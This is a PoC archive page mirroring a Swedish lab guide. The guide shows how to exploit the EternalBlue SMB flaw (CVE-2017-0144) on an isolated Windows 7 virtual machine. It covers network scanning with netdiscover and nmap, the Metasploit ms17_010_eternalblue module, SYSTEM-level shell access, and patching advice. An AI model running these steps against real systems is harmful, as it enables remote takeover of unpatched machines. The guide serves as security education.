Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2017-0144 PoC — Microsoft Windows SMB 输入验证错误漏洞

Source
Associated Vulnerability
Title:Microsoft Windows SMB 输入验证错误漏洞 (CVE-2017-0144)
Description:The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka "Windows SMB Remote Code Execution Vulnerability." This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.
Readme
# Windows-7_och_CVE-2017-0144_Exploit

Detta är en Guide på hur du kan test sårbarheten CVE-2017-0144 som användes som exploit av den kända ransomware WannaCry. Jag kommer även att gå genom hur man kan Skydda sig.

Material som används:
- Windows 7 Ultimate SP1 x64 - https://www.kali.org/get-kali/#kali-virtual-machines
- Kali Linux - https://archive.org/details/win-7-ult-sp-1-english-x-64
- Oracle Virtualbox (Eller valfri) - https://www.virtualbox.org/wiki/Downloads

Vi börjar med att sätta upp miljön i Virtualbox.
<img width="802" height="117" alt="image" src="https://github.com/user-attachments/assets/fe1d98f2-f1c7-4c46-8f2e-54414de21f21" />


Vi vill inte att maskinerna ska kunna nå internet:
Högerklicka på virtuella maskinen -> Settings -> Network -> Gå till Adapter och ändra till Host-Only som visas på bilden nedan.

<img width="561" height="169" alt="image" src="https://github.com/user-attachments/assets/2e7d3218-7c8a-4b12-be4a-e4f182bd6d90" />
Detta ska du göra på både Kali och Windows 7 enheterna.

//

Nu ska vi starta upp båda Windows 7 samt Kali

För windows måste du gå genom installationen sedan gå till Windows Firewall och stänga av brandväggen, följ bilderna.

<img width="691" height="527" alt="image" src="https://github.com/user-attachments/assets/afdd5ae1-32c5-44dd-949d-8b819e59e5e4" />
<img width="690" height="534" alt="image" src="https://github.com/user-attachments/assets/dfe2b02b-8092-4393-9171-78a4863d7416" />
<img width="692" height="530" alt="image" src="https://github.com/user-attachments/assets/668cfa09-afbd-4ae6-bfe9-4d514baf81a2" />

//


Efter att vi har stängt av brandväggen kan vi gå över till kali linux som vi har installerat, logga in med:

- Användarnamet: Kali
- Lösenordet: kali

Först vi ska se till att det är rätt datum och tid.
<img width="691" height="499" alt="image" src="https://github.com/user-attachments/assets/2ffb7be6-a76e-44e5-8ed2-f9703cf7c782" />
<img width="688" height="499" alt="image" src="https://github.com/user-attachments/assets/6b387b80-8e16-4be9-aa3c-8cbee7a3ce0c" />
<img width="693" height="501" alt="image" src="https://github.com/user-attachments/assets/1105af40-4d26-43d2-824a-b30e96a9822b" />
<img width="689" height="497" alt="image" src="https://github.com/user-attachments/assets/c98fdc4e-2ba1-4640-8ce1-7552e2cac6d2" />

Sedan ska du ställa in rätt time zone.

<img width="688" height="501" alt="image" src="https://github.com/user-attachments/assets/6a640104-e727-46a3-b61e-51294f4379d4" />

När du har ställt in rätt ska du trycka på Lock -> Authenticate.

//

Nu är vi klara med sätta upp miljön och är redo för att utföra en angrepp för att testa sårbarheten.

Det första steget vi ska göra är att ta reda på vilken ip adress vi har på vår kali maskin. 

- Öppna terminalen sedan skriv: ip a

Under eth0 leta efter inet och tilldelda ip adressen.
<img width="687" height="495" alt="image" src="https://github.com/user-attachments/assets/a3896439-5cb8-43af-a990-37ed4291eecc" />

Nu vet vi att vi har adressen 192.168.56.102 nästa steg ska vi sniffa information genom vår anslutning.

- I terminalen skriv: Sudo netdiscover

Efter att du har autentiserat, det som händer är att vi skickar broadcast föråga till alla i vårt nätverk.
<img width="689" height="499" alt="image" src="https://github.com/user-attachments/assets/99af8f29-6768-44c3-a41a-c90128cebc89" />

Här får vi alla enheter eller ip adresser som finns. Tryck Control + C 

Nu ska vi ta reda på vilka oprativsystem kör dessa enheter.
- Därmed skriv: Sudo nmap -O [Alla ip adresser som du fick fram]
<img width="686" height="500" alt="image" src="https://github.com/user-attachments/assets/0b0ccfd2-ace0-4c24-8b9f-af0c2a3dbddd" />

Nu får vi fram information som vi behöver läsa genom och hitta det som är intressant för oss. 
<img width="559" height="403" alt="image" src="https://github.com/user-attachments/assets/46162314-c5b4-4a71-b133-13fa26b3da6b" />
Vi kan se att dessa två enheter har ointressant information.

Dock så är vi på rätt spår och nu har vi ip addressen till vår windows 7 maskin.
<img width="560" height="402" alt="image" src="https://github.com/user-attachments/assets/5f275ef1-b32a-41b6-9e80-87a30866282c" />

//

Nu när vi har tillräckligt mycket information som Ip-adress och vilken oprativsystem offret har kan vi utföra vår exploit. Skriv följande komando:

- msfconsole
<img width="696" height="504" alt="image" src="https://github.com/user-attachments/assets/32513295-32c3-45d8-a45f-cc425c334733" />

- use exploit/windows/smb/ms17_010_eternalblue
<img width="688" height="501" alt="image" src="https://github.com/user-attachments/assets/4836957b-8ec8-4fcf-9e0b-290dcc132851" />

- set RHOSTS [Offrets IP Adress]
<img width="686" height="500" alt="image" src="https://github.com/user-attachments/assets/af2620d1-f5d2-47ab-aac6-a0780bbe1127" />

- set LHOST eth0
<img width="696" height="499" alt="image" src="https://github.com/user-attachments/assets/964679fc-1e90-44ad-a896-e7b6d940ad82" />

- run
<img width="691" height="502" alt="image" src="https://github.com/user-attachments/assets/80b99b15-f07b-41bd-b45e-5eb316fb9d2d" />


Grattis du lyckats om du ser meterpreter>
//

Nu när vi är inne ska vi kolla upp vad vi har för rättigheter skriv i terminalen:

- shell
- whoami
<img width="689" height="500" alt="image" src="https://github.com/user-attachments/assets/d19a586e-869f-4ee5-b7ed-d0c577bf0aeb" />

Här ser vi vilken Windows version som är installerat samt att vi har system rättigheter.

Om du vill visa att du är inne på ett coolt sätt skriv detta i terminalen:
- msg * "Du har blivit hackad!"
<img width="694" height="1031" alt="image" src="https://github.com/user-attachments/assets/acd9c4d2-b1fa-4e2f-abcb-5486bfe5f034" />

//

Hur kan man skydda sig mot denna exploit?
- För att åtgärda detta måste man installera säkerhetsuppdateringen MS17-010 från Microsoft samt inaktivera det gamla protokollet SMBv1 i Windows-inställningarna. Även säga till att brandväggen är rätt konfigrerat.




** Tack för att ni kollar på min Guide! **
File Snapshot

[4.0K] /data/pocs/5830ea30dc8ba1d97d3388dfdb0456bd1620e87b └── [6.0K] README.md 1 directory, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →